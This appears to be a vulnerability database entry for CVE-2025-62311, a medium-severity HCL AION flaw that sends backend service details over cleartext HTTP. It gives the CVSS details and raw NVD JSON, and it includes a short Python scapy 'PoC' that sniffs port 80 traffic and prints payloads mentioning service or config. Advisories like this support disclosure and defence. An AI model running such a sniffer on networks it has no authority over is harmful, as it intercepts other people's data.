Security Vulnerability Report
中文
CVE-2025-62311 CVSS 4.3 MEDIUM

CVE-2025-62311

Published: 2026-05-14 17:16:18
Last Modified: 2026-05-14 17:22:47

Description

HCL AION is affected by a vulnerability where backend service details may be transmitted over insecure HTTP channels. This may expose sensitive information to potential interception or unauthorized access during transmission under certain conditions

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:A/AC:H/PR:L/UI:R/S:U/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

HCL AION 特定版本(具体请参考厂商公告 KB0130636)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# PoC: Sniffing unencrypted HTTP traffic for HCL AION # Usage: python3 poc.py (requires admin/root privileges) from scapy.all import * def packet_callback(packet): if packet.haslayer(TCP) and packet.haslayer(Raw): if packet[TCP].dport == 80 or packet[TCP].sport == 80: try: payload = packet[Raw].load.decode('utf-8', errors='ignore') # Look for potential backend details in headers or body if "service" in payload.lower() or "config" in payload.lower(): print(f"[+] Captured sensitive data: {payload}") except Exception as e: pass print("[*] Monitoring HTTP traffic for HCL AION backend details...") sniff(filter="tcp port 80", prn=packet_callback, store=0)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-62311", "sourceIdentifier": "[email protected]", "published": "2026-05-14T17:16:18.337", "lastModified": "2026-05-14T17:22:46.577", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "HCL AION is affected by a vulnerability where backend service details may be transmitted over insecure HTTP channels. This may expose sensitive information to potential interception or unauthorized access during transmission under certain conditions"}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:A/AC:H/PR:L/UI:R/S:U/C:L/I:L/A:L", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "ADJACENT_NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 0.9, "impactScore": 3.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-319"}]}], "references": [{"url": "https://support.hcl-software.com/csm?id=kb_article&sysparm_article=KB0130636", "source": "[email protected]"}]}}